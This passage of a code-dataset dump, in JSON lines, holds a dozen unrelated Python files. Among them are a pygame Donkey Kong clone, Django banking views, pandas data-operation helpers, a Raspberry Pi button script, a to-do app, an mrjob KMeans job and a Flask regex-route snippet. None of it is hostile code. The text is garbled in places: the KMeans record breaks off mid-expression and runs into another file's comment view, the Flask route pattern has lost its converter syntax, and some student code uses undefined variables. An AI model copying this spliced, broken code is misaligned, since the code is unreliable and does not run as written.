Game , you just have to save the Queen.\", 1 , (0,0,0))\n    rule2 = font.render(\" - Player can not climb up a broken Ladder.\", 1 , (0,0,0))\n    rule3 = font.render(\" - Coins give you 5 points each.\" , 1, (0,0,0))\n    rule4 = font.render(\" - Heart gives you an extra life. \" , 1 , (0,0,0))\n    rule5 = font.render(\" - Winning a game gives you 50 points. \" , 1 , (0,0,0))\n    rule6 = font.render(\" - If you get hit by a Fireball, you'll respawn , \" , 1 , (0,0,0))\n    rule7 = font.render(\" lose a life and get penalized with 25 points. \" , 1 , (0,0,0))\n    rule8 = font.render(\" - If you get hit by a Donkey , then you lose the game. \" , 1 , (0,0,0))\n    rule9 = font.render(\" - Press any key to play. \" , 1 , (0,0,0))\n\n    titlepos = title.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-300)\n    namepos = name.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-220)\n    rulepos = rule.get_rect(centerx=WIDTH/2,centery=HEIGHT/2-180)\n    textpos1 = rule1.get_rect(centery=HEIGHT/2-120)\n    textpos2 = rule2.get_rect(centery=HEIGHT/2-60)\n    textpos3 = rule3.get_rect(centery=HEIGHT/2)\n    textpos4 = rule4.get_rect(centery=HEIGHT/2+60)\n    textpos5 = rule5.get_rect(centery=HEIGHT/2+120)\n    textpos6 = rule6.get_rect(centery=HEIGHT/2+180)\n    textpos7 = rule7.get_rect(centery=HEIGHT/2+240)\n    textpos8 = rule8.get_rect(centery=HEIGHT/2+300)\n    textpos9 = rule9.get_rect(centery=HEIGHT/2+360)\n\n    back = pygame.image.load(\"images/DKback.jpg\")\n    screen.blit(back,(0,0))\n    screen.blit(name,namepos)\n    screen.blit(title,titlepos)\n    screen.blit(rule1,textpos1)\n    screen.blit(rule2,textpos2)\n    screen.blit(rule3,textpos3)\n    screen.blit(rule4,textpos4)\n    screen.blit(rule5,textpos5)\n    screen.blit(rule6,textpos6)\n    screen.blit(rule7,textpos7)\n    screen.blit(rule8,textpos8)\n    screen.blit(rule9,textpos9)\n\n    pygame.display.flip()\n\n    flag = 0\n    while 1:\n        for event in pygame.event.get():\n            if event.type == pygame.KEYDOWN:\n                flag = 1\n        if flag:\n            break\n\n    \"\"\" Initializing Game \"\"\"\n    game = Game(0,3,1)\n\n    \"\"\" Adding Sounds \"\"\"\n    game.ouch_sound = pygame.mixer.Sound(\"sounds/ouch.ogg\")\n    game.coin_sound = pygame.mixer.Sound(\"sounds/coin.ogg\")\n    game.win_sound = pygame.mixer.Sound(\"sounds/win.ogg\")\n    game.gameover_sound = pygame.mixer.Sound(\"sounds/gameover.ogg\")\n    game.extralife_sound = pygame.mixer.Sound(\"sounds/extralife.ogg\")\n    pygame.mixer.music.load(\"sounds/bacmusic.wav\")\n\n    pygame.mixer.music.play(-1)\n\n    \"\"\" Main Program Loop \"\"\"\n    while not done:\n\n        \"\"\" Process Key Strokes \"\"\"\n        done = game.process_Events()\n\n        \"\"\"Adding Fireballs\"\"\"\n        game.editFireball()\n\n        \"\"\" Randomizing turning of Donkey \"\"\"\n        game.turnDonkey()\n\n        \"\"\" Update Sprites \"\"\"\n        game.updateSprites()\n\n        \"\"\" Checking if Player collects a Coin \"\"\"\n        game.collectCoin()\n\n        \"\"\" Checking if Player gains a life \"\"\"\n        game.collectLife()\n\n        \"\"\" Checking if Player dies \"\"\"\n        game.checkCollision()\n\n        \"\"\" Checking if Player Wins the Game \"\"\"\n        game.checkWin()\n\n        \"\"\" Drawing the Screen \"\"\"\n        game.drawFrame(screen)\n\n        \"\"\" FPS Pause for the next Frame\"\"\"\n        clock.tick(60)\n\n        \"\"\" Incrementing counter \"\"\"\n        game.counter += 1\n\n    \"\"\" Close Screen and exit; the original called pygame.quit() at module\n    level, which ran at import time before main() ever started \"\"\"\n    pygame.quit()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"201402087/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":14218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"37968885","text":"from django.db import transaction\nfrom django.urls import reverse_lazy\nfrom django.views import generic\nfrom django.views.generic import CreateView\nfrom django.views.generic import FormView\nfrom django.views.generic import ListView\nfrom django.views.generic.edit import UpdateView\n\nfrom core.forms.jursit import Block_Account_form, Jursit_ChequeDetail_Form, Jursit_LoanDetail_Form\nfrom core.models import ChequeIssue, Account, Cashier, Transaction, LoanApplication\n\n\nclass Block_Account_view(FormView):\n template_name = 'core/simple_from_with_single_button.html'\n success_url = reverse_lazy('core:main_panel')\n form_class = Block_Account_form\n\n @transaction.atomic\n def form_valid(self, form):\n account = form.cleaned_data.get('account')\n account.is_blocked = True\n account.save()\n return super(Block_Account_view, self).form_valid(form)\n\n#\n# class Block_Account_view(FormView):\n# template_name = 'core/simple_from_with_single_button.html'\n# success_url = reverse_lazy('core:main_panel')\n# form_class = Block_Account_form\n#\n# @transaction.atomic\n# def form_valid(self, form):\n# account = form.cleaned_data.get('account')\n# account.is_blocked = True\n# account.save()\n#\n# return super(Block_Account_view, self).form_valid(form)\n#\n\n\n\nclass Jursit_Check_Issue_Requests_view(ListView):\n model = ChequeIssue\n template_name = 'core/jursit_cheque_issue.html'\n context_object_name = 'cheque_issue_list'\n\n def get_queryset(self):\n return ChequeIssue.objects.filter(legal_expert_validation= 'NA').order_by('date')\n\n\n\nclass Jursit_ChequeDetailView(UpdateView):\n model = ChequeIssue\n template_name = 'core/jursit_cheque_detail.html'\n success_url = reverse_lazy('core:main_panel')\n form_class = Jursit_ChequeDetail_Form\n\n def form_valid(self, form):\n legal_expert_validation = form.cleaned_data.get('legal_expert_validation')\n cheque_issue = ChequeIssue.objects.get(id=self.kwargs['pk'])\n cheque_issue.legal_expert_validation = legal_expert_validation\n cheque_issue.save()\n return super(Jursit_ChequeDetailView, self).form_valid(form)\n\n\nclass Jursit_Loan_Requests_view(ListView):\n model = LoanApplication\n template_name = 'core/jursit_loan_issue.html'\n context_object_name = 'loan_list'\n\n def get_queryset(self):\n return LoanApplication.objects.filter(legal_expert_validation= 'NA')\n\n\n\nclass Jursit_LoanDetailView(UpdateView):\n model = LoanApplication\n template_name = 'core/jursit_loan_detail.html'\n success_url = reverse_lazy('core:main_panel')\n form_class = Jursit_LoanDetail_Form\n\n def form_valid(self, form):\n legal_expert_validation = form.cleaned_data.get('legal_expert_validation')\n loan_application = LoanApplication.objects.get(id=self.kwargs['pk'])\n loan_application.legal_expert_validation = legal_expert_validation\n loan_application.save()\n return super(Jursit_LoanDetailView, self).form_valid(form)\n\n\n","sub_path":"core/views/jursit.py","file_name":"jursit.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"498213864","text":"#Jon Cracolici\n#Lesson 2 Series Problems\n#UW Python Cert\ndef fibonacci(n):\n \"\"\"Returns Fibonacci Sequence value at 'n' index, with indexing starting at 0.\n arg1 = n = index of the value you wish to be returned.\n \"\"\"\n try:\n if n>=0 and (n%int(n)==0.0) == True:\n pass\n else:\n print('Please use a natural number')\n return\n except:\n print('Please use a natural number')\n return\n intcheck = int(n)\n if intcheck == 0:\n return 0\n elif intcheck == 1:\n return 1\n fsequence = list(range(intcheck+1))\n for i in fsequence[2:]:\n fsequence[i] = fsequence[i-1] + fsequence[i-2]\n return fsequence[intcheck]\nfibonacci(6)\ndef lucas(n):\n \"\"\"Returns Lucas Sequence value at 'n' index, with indexing starting at 0.\n arg1 = n = index of the value you wish to be returned.\n \"\"\" \n try:\n if n>=0 and (n%int(n)==0.0) == True:\n pass\n else:\n print('Please use a natural number')\n return\n except:\n print('Please use a natural number')\n return\n intcheck=int(n)\n if intcheck == 0:\n return 2\n elif intcheck == 1:\n return 1\n lsequence = list(range(intcheck+1))\n lsequence[0]=2\n for i in lsequence[2:]:\n lsequence[i] = lsequence[i-1] + lsequence[i-2]\n #print(lsequence[n])\n #print(lsequence)\n return lsequence[intcheck]\nlucas(6)\ndef sum_series(n, a=0, b=1):\n \"\"\"Returns the value of recursively additive seq at 'n' index,\n defaults to fibonacci. you may use kwargs 'a' and 'b' to set the \n values of the first two indicies.\n arg1 = n = index of the value you wish to be returned.\n kwarg1 = a = value of sequence at index 0.\n kwarg2 = b = value of sequence at index 1.\n \"\"\"\n try:\n if n>=0 and (n%int(n)==0.0) == True:\n pass\n else:\n print('Please use a natural number')\n return\n except:\n print('Please use a natural number')\n return\n intcheck = int(n)\n if intcheck == 0:\n return a\n elif intcheck == 1:\n return b\n sslist = list(range(intcheck+1))\n sslist[0] = a\n sslist[1] = b\n for i in sslist[2:]:\n sslist[i] = sslist[i-1] + sslist[i-2]\n return sslist[intcheck]\nsum_series(6.5, a=2, b=1)\n#This block of code is used to assert that the functions provide\n#the correct answers for index = 6, and also that the sum_series\n#function can create either the fibonacci or lucas series.\n\nassert fibonacci(6)==8\nassert lucas(6)==18\nassert sum_series(6)==fibonacci(6)\nassert sum_series(6, a=2, b=1)==lucas(6)","sub_path":"students/Cracolici_Jon/lesson02/JonCracolici_Lesson2_Series.py","file_name":"JonCracolici_Lesson2_Series.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"306193844","text":"from arsenal.alphabet import Alphabet\nfrom collections import Counter, defaultdict\nfrom vocrf.util import prefixes, suffixes, ngram_counts\nfrom arsenal import iterview\n\n\nclass Dataset(object):\n\n def __init__(self, train, dev, test):\n self.train = train\n self.dev = dev\n self.test = test\n # indexes will be populated by `_index`.\n self.Y = Alphabet() # tag set\n self.V = Alphabet() # vocabulary\n self.V_freq = Counter() # token unigram counts\n self.V2Y = defaultdict(set) # tag dictionary\n self.prefixes = Counter()\n self.suffixes = Counter()\n self._index(self.train)\n\n def _index(self, data):\n \"frequency tables, etc.\"\n for sentence in data:\n for y, w in sentence:\n self.Y.add(y)\n self.V.add(w)\n self.V2Y[w].add(y)\n self.V_freq[w] += 1\n for prefix in prefixes(w):\n self.prefixes[prefix] += 1\n for suffix in suffixes(w):\n self.suffixes[suffix] += 1\n\n def make_instances(self, fold, cls):\n \"Convert tuples in data `fold` to instances of `cls`.\"\n data = []\n for x in iterview(getattr(self, fold), msg='Features (%s)' % fold):\n tags, tokens = list(zip(*x))\n data.append(cls(tokens, self.Y.map(tags), self))\n return data\n\n def tag_ngram_counts(self, n):\n \"Returns tag ngram count for subsequences of length n.\"\n\n# Y = self.Y\n\n def tag_sequences():\n \"\"\"Iterate over tag sequence (as `str` instead of `int`, which is how they are\n stored.).\n\n \"\"\"\n for e in self.train:\n y, _ = list(zip(*e))\n# assert all(isinstance(yy, int) for yy in y), y\n# yield tuple(Y.lookup_many(y))\n yield y\n\n return ngram_counts(tag_sequences(), n)\n","sub_path":"vocrf/ner/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"523607751","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, print_function\n\nimport pandas as pd\nfrom django.conf import settings\n\nfrom action.models import Condition, Action\nfrom dataops import formula_evaluation\nfrom dataops.pandas_db import (\n create_table_name,\n create_upload_table_name,\n store_table,\n df_column_types_rename,\n load_table,\n get_table_data,\n is_table_in_db,\n get_table_queryset,\n pandas_datatype_names)\nfrom table.models import View\nfrom workflow.models import Workflow, Column\n\n\ndef is_unique_column(df_column):\n \"\"\"\n\n :param df_column: Column of a pandas data frame\n :return: Boolean encoding if the column has unique values\n \"\"\"\n return len(df_column.unique()) == len(df_column)\n\n\ndef are_unique_columns(data_frame):\n \"\"\"\n\n :param data_frame: Pandas data frame\n :return: Array of Booleans stating of a column has unique values\n \"\"\"\n return [is_unique_column(data_frame[x]) for x in list(data_frame.columns)]\n\n\ndef load_upload_from_db(pk):\n return load_table(create_upload_table_name(pk))\n\n\ndef store_table_in_db(data_frame, pk, table_name, temporary=False):\n \"\"\"\n Update or create a table in the DB with the data in the data frame. It\n also updates the corresponding column information\n\n :param data_frame: Data frame to dump to DB\n :param pk: Corresponding primary key of the workflow\n :param table_name: Table to use in the DB\n :param temporary: Boolean stating if the table is temporary,\n or it belongs to an existing workflow.\n :return: If temporary = True, then return a list with three lists:\n - column names\n - column types\n - column is unique\n If temporary = False, return None. All this info is stored in\n the workflow\n \"\"\"\n\n if settings.DEBUG:\n print('Storing table ', table_name)\n\n # get column names and types\n df_column_names = list(data_frame.columns)\n df_column_types = df_column_types_rename(data_frame)\n\n # if the data frame is temporary, the procedure is much simpler\n if temporary:\n # Get the if the columns have unique values per row\n column_unique = are_unique_columns(data_frame)\n\n # Store the table in the DB\n store_table(data_frame, table_name)\n\n # Return a list with three list with information about the\n # data frame that will be needed in the next steps\n return [df_column_names, df_column_types, column_unique]\n\n # We are modifying an existing DF\n\n # Get the workflow and its columns\n workflow = Workflow.objects.get(id=pk)\n wf_col_names = Column.objects.filter(\n workflow__id=pk\n ).values_list(\"name\", flat=True)\n\n # Loop over the columns in the data frame and reconcile the column info\n # with the column objects attached to the WF\n for cname in df_column_names:\n # See if this is a new column\n if cname in wf_col_names:\n # If column already exists in wf_col_names, no need to do anything\n continue\n\n # Create the new column\n Column.objects.create(\n name=cname,\n workflow=workflow,\n data_type=pandas_datatype_names[\n data_frame[cname].dtype.name],\n is_key=is_unique_column(data_frame[cname]))\n\n # Get now the new set of columns with names\n wf_column_names = Column.objects.filter(\n workflow__id=pk).values_list('name', flat=True)\n\n # Reorder the columns in the data frame\n data_frame = data_frame[list(wf_column_names)]\n\n # Store the table in the DB\n store_table(data_frame, table_name)\n\n # Update workflow fields and save\n workflow.nrows = data_frame.shape[0]\n workflow.ncols = data_frame.shape[1]\n 
workflow.set_query_builder_ops()\n workflow.data_frame_table_name = table_name\n workflow.save()\n\n return None\n\n\ndef store_dataframe_in_db(data_frame, pk):\n \"\"\"\n Given a dataframe and the primary key of a workflow, it dumps its content on\n a table that is rewritten every time.\n\n :param data_frame: Pandas data frame containing the data\n :param pk: The unique key for the workflow\n :return: Nothing. Side effect in the database\n \"\"\"\n return store_table_in_db(data_frame, pk, create_table_name(pk))\n\n\ndef store_upload_dataframe_in_db(data_frame, pk):\n \"\"\"\n Given a dataframe and the primary key of a workflow, it dumps its content on\n a table that is rewritten every time.\n\n :param data_frame: Pandas data frame containing the data\n :param pk: The unique key for the workflow\n :return: If temporary = True, then return a list with three lists:\n - column names\n - column types\n - column is unique\n If temporary = False, return None. All this infor is stored in\n the workflow\n \"\"\"\n return store_table_in_db(data_frame,\n pk,\n create_upload_table_name(pk),\n True)\n\n\ndef get_table_row_by_index(workflow, cond_filter, idx):\n \"\"\"\n Select the set of elements in the row with the given index\n\n :param workflow: Workflow object storing the data\n :param cond_filter: Condition object to filter the data (or None)\n :param idx: Row number to get (first row is idx = 1)\n :return: A dictionary with the (column_name, value) data or None if the\n index is out of bounds\n \"\"\"\n\n # Get the data\n data = get_table_data(workflow.id, cond_filter)\n\n # If the data is not there, return None\n if idx > len(data):\n return None\n\n return dict(zip(workflow.get_column_names(), data[idx - 1]))\n\n\ndef workflow_has_table(workflow_item):\n return is_table_in_db(create_table_name(workflow_item.id))\n\n\ndef workflow_id_has_table(workflow_id):\n return is_table_in_db(create_table_name(workflow_id))\n\n\ndef workflow_has_upload_table(workflow_item):\n return is_table_in_db(\n create_upload_table_name(workflow_item.id)\n )\n\n\ndef get_queryset_by_workflow(workflow_item):\n return get_table_queryset(create_table_name(workflow_item.id))\n\n\ndef get_queryset_by_workflow_id(workflow_id):\n return get_table_queryset(create_table_name(workflow_id))\n\n\ndef perform_dataframe_upload_merge(pk, dst_df, src_df, merge_info):\n \"\"\"\n It either stores a data frame in the db (dst_df is None), or merges\n the two data frames dst_df and src_df and stores its content.\n\n :param pk: Primary key of the Workflow containing the data frames\n :param dst_df: Destination dataframe (already stored in DB)\n :param src_df: Source dataframe, stored in temporary table\n :param merge_info: Dictionary with merge options\n :return:\n \"\"\"\n\n # STEP 1 Rename the column names.\n src_df = src_df.rename(\n columns=dict(zip(merge_info['initial_column_names'],\n merge_info.get('autorename_column_names', None) or\n merge_info['rename_column_names'])))\n\n # STEP 2 Drop the columns not selected\n columns_to_upload = merge_info['columns_to_upload']\n src_df.drop([n for x, n in enumerate(list(src_df.columns))\n if not columns_to_upload[x]],\n axis=1, inplace=True)\n\n # If no dst_df is given, simply dump the frame in the DB\n if dst_df is None:\n store_dataframe_in_db(src_df, pk)\n return None\n\n # Step 3. Drop the columns that are going to be overriden.\n dst_df.drop(merge_info['override_columns_names'],\n inplace=True,\n axis=1)\n # Step 4. 
Perform the merge\n try:\n new_df = pd.merge(dst_df,\n src_df,\n how=merge_info['how_merge'],\n left_on=merge_info['dst_selected_key'],\n right_on=merge_info['src_selected_key'])\n except Exception as e:\n return 'Merge operation failed. Exception: ' + e.message\n\n # If the merge produced a data frame with no rows, flag it as an error to\n # prevent loosing data when there is a mistake in the key column\n if new_df.shape[0] == 0:\n return 'Merge operation produced a result with no rows'\n\n # For each column, if it is overriden, remove it, if not, check that the\n # new column is consistent with data_type, and allowed values,\n # and recheck its unique key status\n for col in Workflow.objects.get(pk=pk).columns.all():\n # If column is overriden, remove it\n if col.name in merge_info['override_columns_names']:\n col.delete()\n continue\n\n # New values in this column should be compatible with the current\n # column properties.\n # Condition 1: Data type\n if pandas_datatype_names[new_df[col.name].dtype.name] != col.data_type:\n return 'New values in column ' + col.name + ' are not of type ' \\\n + col.data_type\n\n # Condition 2: If there are categories, the new values should be\n # compatible with them.\n if col.categories and not all([x in col.categories\n for x in new_df[col.name]]):\n return 'New values in column ' + col.name + ' are not within ' \\\n + 'the categories ' + ', '.join(col.categories)\n\n # Condition 3:\n col.is_key = is_unique_column(new_df[col.name])\n\n # Store the result back in the DB\n store_dataframe_in_db(new_df, pk)\n\n # Operation was correct, no need to flag anything\n return None\n\n\ndef data_frame_add_empty_column(df, column_name, column_type, initial_value):\n \"\"\"\n\n :param df: Data frame to modify\n :param column_name: Name of the column to add\n :param column_type: type of the column to add\n :param initial_value: initial value in the column\n :return: new data frame with the additional column\n \"\"\"\n\n # How to add a new column with a specific data type in DataFrame\n # a = np.empty((10,), dtype=[('column_name', np.float64)])\n # b = np.empty((10,), dtype=[('nnn', np.float64)] (ARRAY)\n # pd.concat([df, pd.DataFrame(b)], axis=1)\n\n if not initial_value:\n # Choose the right numpy type\n if column_type == 'string':\n initial_value = ''\n elif column_type == 'integer':\n initial_value = 0\n elif column_type == 'double':\n initial_value = 0.0\n elif column_type == 'boolean':\n initial_value = False\n elif column_type == 'datetime':\n initial_value = pd.NaT\n else:\n raise ValueError('Type ' + column_type + ' not found.')\n\n # Create the empty column\n df[column_name] = initial_value\n\n return df\n\n\ndef rename_df_column(df, workflow, old_name, new_name):\n \"\"\"\n Function to change the name of a column in the dataframe.\n\n :param df: dataframe\n :param workflow: workflow object that is handling the data frame\n :param old_name: old column name\n :param new_name: new column name\n :return: Workflow object updated\n \"\"\"\n\n # Rename the appearances of the variable in all conditions/filters\n conditions = Condition.objects.filter(action__workflow=workflow)\n for cond in conditions:\n cond.formula = formula_evaluation.rename_variable(\n cond.formula, old_name, new_name)\n cond.save()\n\n # Rename the appearances of the variable in all actions\n for action_item in Action.objects.filter(workflow=workflow):\n action_item.rename_variable(old_name, new_name)\n\n # Rename the appearances of the variable in the formulas in the views\n for view in 
View.objects.filter(workflow=workflow):\n view.formula = formula_evaluation.rename_variable(\n view.formula,\n old_name,\n new_name\n )\n view.save()\n\n return df.rename(columns={old_name: new_name})\n\n\ndef detect_datetime_columns(data_frame):\n \"\"\"\n Given a data frame traverse the columns and those that have type \"string\"\n try to see if it is of type datetime. If so, apply the translation.\n :param data_frame: Pandas dataframe to detect datetime columns\n :return:\n \"\"\"\n # Strip white space from all string columns and try to convert to\n # datetime just in case\n for x in list(data_frame.columns):\n if data_frame[x].dtype.name == 'object':\n # Column is a string!\n data_frame[x] = data_frame[x].str.strip()\n\n # Try the datetime conversion\n try:\n series = pd.to_datetime(data_frame[x],\n infer_datetime_format=True)\n # Datetime conversion worked! Update the data_frame\n data_frame[x] = series\n except ValueError:\n pass\n return data_frame\n","sub_path":"src/dataops/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":12768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
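`detect_datetime_columns` and `data_frame_add_empty_column` are the only helpers in this module with no database side effects, so they can be sanity-checked standalone; a small sketch (import path assumed from the record's `sub_path`, behavior as of the pandas versions contemporary with this code):

```python
import pandas as pd

from dataops.ops import data_frame_add_empty_column, detect_datetime_columns

df = pd.DataFrame({
    'name': ['  ann ', 'bob'],             # string columns get stripped first
    'when': ['2018-01-02', '2018-03-04'],  # strings that parse as dates
})

df = detect_datetime_columns(df)
assert df['name'].iloc[0] == 'ann'                      # whitespace stripped
assert df['when'].dtype.name.startswith('datetime64')   # conversion applied

df = data_frame_add_empty_column(df, 'score', 'double', None)
assert (df['score'] == 0.0).all()   # 'double' defaults to 0.0
```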
+{"seq_id":"635852042","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(2, GPIO.IN)\nGPIO.setup(22, GPIO.OUT)\ncount = 0\n\n\ntry:\n while True:\n input_state = GPIO.input(2)\n print(input_state)\n if input_state == GPIO.LOW:\n count = count + 1\n print('Button pressed ' + str(count) +' times')\n GPIO.output(22, GPIO.LOW)\n time.sleep(0.1)\n GPIO.output(22, GPIO.HIGH)\nexcept KeyboardInterrupt:\n print('Quit')\n GPIO.cleanup()\n\n","sub_path":"PENSS/rasbery/lat3.py","file_name":"lat3.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550042632","text":"\n\ndef menu(): \n print(\"[1] Add to-do list\") \n print(\"[2] View to-do list\")\n print(\"[3] Exit\")\n\n \n userinput = int(input(\"\"))\n \n \n if userinput == 1:\n addToDo()\n elif userinput == 2:\n viewToDo()\n elif userinput == 3: \n return()\n\n\ndef viewToDo(): \n file = open(\"todolist.txt\", \"r\")\n\n if file.read() == \"\": \n print(\"There are no to-dos!\")\n menu() \n return 0\n else: \n file.seek(0) \n print(\"##### To-do list #####\") \n num = 1 \n for list in file: \n list = list.split(\"#\")\n print(\"[{}] {}\".format(num, list[0]))\n num += 1 \n \n print(\"[0] Main menu\")\n file.close() \n con = int(input(\"\"))\n\n if con == 0: \n menu()\n else:\n viewTodoContents(con)\n\n\ndef viewTodoContents(pos):\n file = open(\"todolist.txt\", 'r') #open file as reading\n\n for list in file:\n if x == pos: \n title_and_content = list.split(\"#\") \n for index, content in enumerate(title_and_content, start=1): \n if index == 1: \n print(\"##### {} #####\".format(content))\n else: \n print(\"{}. {}\".format(index-1, content))\n x += 1 \n print(\"[1] Go back\")\n print(\"[0] Main menu\")\n file.close() \n con = int(input(\"\")) \n\n if con == 0:\n menu()\n elif con == 1:\n viewToDo()\n\n\n\ndef addToDo():\n print(\"##### To-do list #####\") \n listcontent = [] \n title = input(\"Title:\") \n x = 1 \n while True:\n content = input(\"{}. \".format(x)) \n if content == \"0\": \n break\n else: \n listcontent.append(content)\n x += 1 \n saveToDo(title, listcontent) \n\n\ndef saveToDo(title, listcontent): \n newTodo = title \n\n for content in listcontent: \n newTodo += \"#{}\".format(content) \n\n file = open(\"todolist.txt\", \"a\") \n file.write(newTodo+\"\\n\") \n file.close()\n\n print(\"To-do list added\")\n menu() \n\n\nmenu()\n","sub_path":"group_act3.py","file_name":"group_act3.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"233519052","text":"# Linear Search\n\ndef linear_search(values, target):\n\tindex = 0\n\tsearch_res = False\n\n\twhile index < len(values) and search_res is False:\n\t\tif values[index] == target:\n\t\t\tsearch_res = True\n\t\telse:\n\t\t\tindex += 1\n\treturn search_res\n\nlist = [1, 23, 16, 57, 34, 97]\nprint(linear_search(list,12))","sub_path":"searching_algorithms/linear_search.py","file_name":"linear_search.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"206859484","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2020 Bitdefender\n# SPDX-License-Identifier: Apache-2.0\n#\n\nimport os\n\nfrom codecs import open\n\nfrom setuptools import find_packages, setup, Command, Extension\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\npackages = ['pydis']\n\nrequires = [\n\t\"setuptools\"\n]\n\nabout = {}\nwith open(os.path.join(here, 'pydis', '__version__.py'), 'r', 'utf-8') as f:\n exec(f.read(), about)\n\nwith open('README.md', 'r', 'utf-8') as f:\n readme = f.read()\n\nsetup(\n name=about['__title__'],\n version=about['__version__'],\n packages=packages,\n package_data={'': ['LICENSE', 'NOTICE'], 'pydis': ['*.pem']},\n package_dir={'pydis': 'pydis'},\n include_package_data=True,\n python_requires=\">=3.4\",\n setup_requires=['wheel'],\n install_requires=requires,\n zip_safe=False,\n classifiers=[\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Programming Language :: Python :: Implementation :: PyPy'\n ],\n ext_modules = [Extension(\"_pydis\",\n sources = [\"_pydis/_pydis.c\", \"_pydis/pydis.c\"],\n define_macros = [('AMD64', None), ('PYDIS_BUILD', None)],\n include_dirs = ['../inc'],\n libraries = ['bddisasm'],\n library_dirs = ['../bin/x64/Release'])]\n)\n","sub_path":"pydis/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"584170415","text":"from mrjob.job import MRJob\nfrom mrjob.job import MRStep\nimport mrjob\nimport sqlite3\nimport math\nimport numpy as np\n\ndef dist(P,C):\n return sum([abs(p - float(c)) ** 2 for p,c in zip(P, C)])\n\nclass KMeans(MRJob):\n OUTPUT_PROTOCOL = mrjob.protocol.RawProtocol\n\n def configure_args(self):\n #Define input file, output file and number of iteration\n super(KMeans, self).configure_args()\n self.add_file_arg('--database')\n #self.add_passthrough_option('--iterations', dest='iterations', default=10, type='int')\n def mapper_loader(self, _, line):\n yield None,line\n def reducer_loader(self,key,values):\n input=\"\"\n for value in values:\n input+=value\n input+=\"¤\"\n yield None,input\n def mapper_init(self):\n self.sqlite_conn = sqlite3.connect(self.options.database)\n self.c = self.sqlite_conn.cursor()\n def mapper(self, _, line):\n centroids=line.split(\"¤\")\n centroids=centroids[:-1]\n points=self.c.execute(\"SELECT (score1-(SELECT min(score1) from Wiki))/((SELECT max(score1) from Wiki)-(SELECT min(score1) from Wiki)),(score2-(SELECT min(score2) from Wiki))/((SELECT max(score2) from Wiki)-(SELECT min(score2) from Wiki)),(score3-(SELECT min(score3) from Wiki))/((SELECT max(score3) from Wiki)-(SELECT min(score3) from Wiki)),(score4-(SELECT min(score4) from Wiki))/((SELECT max(score4) from Wiki)-(SELECT min(score4) from Wiki)) from Wiki\")\n for point in points:\n min=-1\n mindist=1000000000\n d=0\n for i in range(len(centroids)):\n d=dist(point,centroids[i].split(\",\"))\n if d c_amount)\n\n return Response({'data': serializer.data, 'isMoreComments': is_more})\n\n","sub_path":"project/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"222911511","text":"#http://stackoverflow.com/questions/5870188/does-flask-support-regular-expressions-in-its-url-routing\n#Even though Armin beat me to the punch with an accepted answer I thought I'd show an abbreviated example of how I implemented a regex matcher in Flask just in case anyone wants a working example of how this could be done.\n\nfrom flask import Flask\nfrom werkzeug.routing import BaseConverter\n\napp = Flask(__name__)\n\nclass RegexConverter(BaseConverter):\n def __init__(self, url_map, *items):\n super(RegexConverter, self).__init__(url_map)\n self.regex = items[0]\n\n\napp.url_map.converters['regex'] = RegexConverter\n\n@app.route('/-/')\ndef example(uid, slug):\n return \"uid: %s, slug: %s\" % (uid, slug)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=5000)\n\n#this URL should return with 200: http://localhost:5000/abc0-foo/\n#this URL should will return with 404: http://localhost:5000/abcd-foo/","sub_path":"all-gists/5743138/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"408044662","text":"from python.component.Component import Component\n\nclass GridSearchComponent(Component):\n selectors = {\n \"dropdown_search_field\": \"id=searchField_chzn\",\n \"search_label\": \"xpath=.//div[@class='input text']//*[text()='Search']\",\n \"input_value_search\": \"id=searchValue\",\n \"button_search\": \"xpath=//button[contains(@class,'btn-search')]\",\n \"send_to\": \"id=sendToList_chzn\",\n \"start_date\": \"id=start_date_on_time\",\n \"end_date\": \"id=end_date_on_time\"\n }\n \n def select_dropdown_search_field(self, field_name):\n locator_dropdown_search_field = self.resolve_selector(\"dropdown_search_field\")\n self.select_dropdown(locator_dropdown_search_field, field_name)\n return self\n\n def input_value_search(self, value):\n return self.input_text(\"input_value_search\", value)\n \n def input_value_start_day(self, value):\n return self.input_text(\"start_date\", value)\n \n def input_value_end_date(self, value):\n return self.input_text(\"end_date\", value)\n\n def click_button_grid_search(self):\n self.click_element(\"button_search\")\n return self\n\n def search_item(self, field, value=None):\n self.select_dropdown_search_field(field)\n if value is 